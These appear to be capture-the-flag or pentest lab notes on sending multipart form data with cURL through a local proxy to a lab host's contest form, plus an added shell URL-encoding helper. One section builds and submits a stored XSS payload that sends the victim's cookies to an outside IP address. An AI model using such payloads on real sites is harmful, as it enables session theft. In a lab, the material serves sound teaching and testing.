Manual Testing with cURL
Multipart Forms
This form expects the following fields:
cat_name: text
age: number
birthdate: date
weight: number
cat_photo: file
The curl command to submit this form:
# -X POST is redundant here, as -F implies this
# Can specify a content type in the multipart/form-data using ;type=
curl --proxy 'http://127.0.0.1:8080' \
-H "Cookie: cookie_here" \
-F 'cat_name=test' \
-F 'age=5' \
-F 'birthdate=1970-01-01' \
-F 'weight=5' \
-F 'cat_photo=@cat.png;type=image/png' \
http://cat.htb/contest.php
URL Encoded Form Data
The -F / --form option has no URL-encoding feature comparable to --data-urlencode, which belongs to -d / --data. To send URL-encoded data in a multipart field you have to encode the value yourself first, in a variable or a subshell, and then interpolate the encoded value into the -F argument.
# Read the payload from a here-document into a variable (a bare "<< EOF" with
# no command reads nothing, so the variable would stay empty). Quoting the
# delimiter keeps the shell from expanding anything inside the payload.
xss_payload=$(cat <<'EOF'
<img src=x onerror="document.location='http://10.10.14.126/?cookie='+document.cookie" />
EOF
)
# URL-encode the data
xss_payload_encoded=$(echo -n "$xss_payload" | jq -sRr @uri)
# -X POST is redundant here, as -F implies this
# Can specify a content type in the multipart/form-data using ;type=
curl --proxy 'http://127.0.0.1:8080' \
-H "Cookie: cookie_here" \
-F "cat_name=${xss_payload_encoded}" \
-F 'age=5' \
-F 'birthdate=1970-01-01' \
-F 'weight=5' \
-F 'cat_photo=@cat.png;type=image/png' \
http://cat.htb/contest.php
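An added example that is not part of the original notes: a dependency-free (no jq) URL encoder in POSIX sh, plus a helper that builds one form field. It also shows a caveat worth knowing when a field value comes from a variable: -F interprets a value starting with "@" or "<" as "read this file", so data you did not author can turn into an unintended file upload; curl's --form-string sends the value literally. The helper names urlencode and form_field, the sample field text and the cookie placeholder are assumptions made here, not anything from the page or the target application.

```shell
#!/bin/sh
# Added example, not from the original notes. Works in dash and bash.

# Percent-encode every byte except the RFC 3986 unreserved set [A-Za-z0-9-._~].
# Bytes are read one at a time via od, so multibyte UTF-8 is encoded per byte.
urlencode() {
    printf '%s' "$1" | od -An -v -tu1 | tr -s ' \n' '\n' | grep -v '^$' |
    while read -r byte; do
        if { [ "$byte" -ge 48 ] && [ "$byte" -le 57 ]; } \
        || { [ "$byte" -ge 65 ] && [ "$byte" -le 90 ]; } \
        || { [ "$byte" -ge 97 ] && [ "$byte" -le 122 ]; } \
        || [ "$byte" -eq 45 ] || [ "$byte" -eq 46 ] \
        || [ "$byte" -eq 95 ] || [ "$byte" -eq 126 ]; then
            # Unreserved: emit the byte itself (decimal -> octal escape).
            printf "\\$(printf '%03o' "$byte")"
        else
            printf '%%%02X' "$byte"
        fi
    done
}

# Build "name=<url-encoded value>" for a single multipart field.
# Pass the result to --form-string, not -F: -F treats a leading '@' or '<'
# in the value as a file to read, --form-string never does.
form_field() {
    printf '%s=%s' "$1" "$(urlencode "$2")"
}

# The page's request with the cat_name value taken from a variable.
# Not invoked below; call it yourself with the desired field text.
submit_cat_form() {
    curl --proxy 'http://127.0.0.1:8080' \
        -H 'Cookie: cookie_here' \
        --form-string "$(form_field cat_name "$1")" \
        -F 'age=5' \
        -F 'birthdate=1970-01-01' \
        -F 'weight=5' \
        -F 'cat_photo=@cat.png;type=image/png' \
        http://cat.htb/contest.php
}

# Show what the encoder produces for a constructed sample value, and how a
# leading '@' is neutralised so curl cannot mistake it for a file reference.
sample_value='<b>hello</b> & friends'
printf 'encoded field: %s\n' "$(form_field cat_name "$sample_value")"
printf 'leading @:     %s\n' "$(form_field cat_name '@cat.png')"
```

Run the file once to see the two encoded fields, then call submit_cat_form with your own value; everything the proxy at 127.0.0.1:8080 sees is the literal, percent-encoded text regardless of what characters the value starts with.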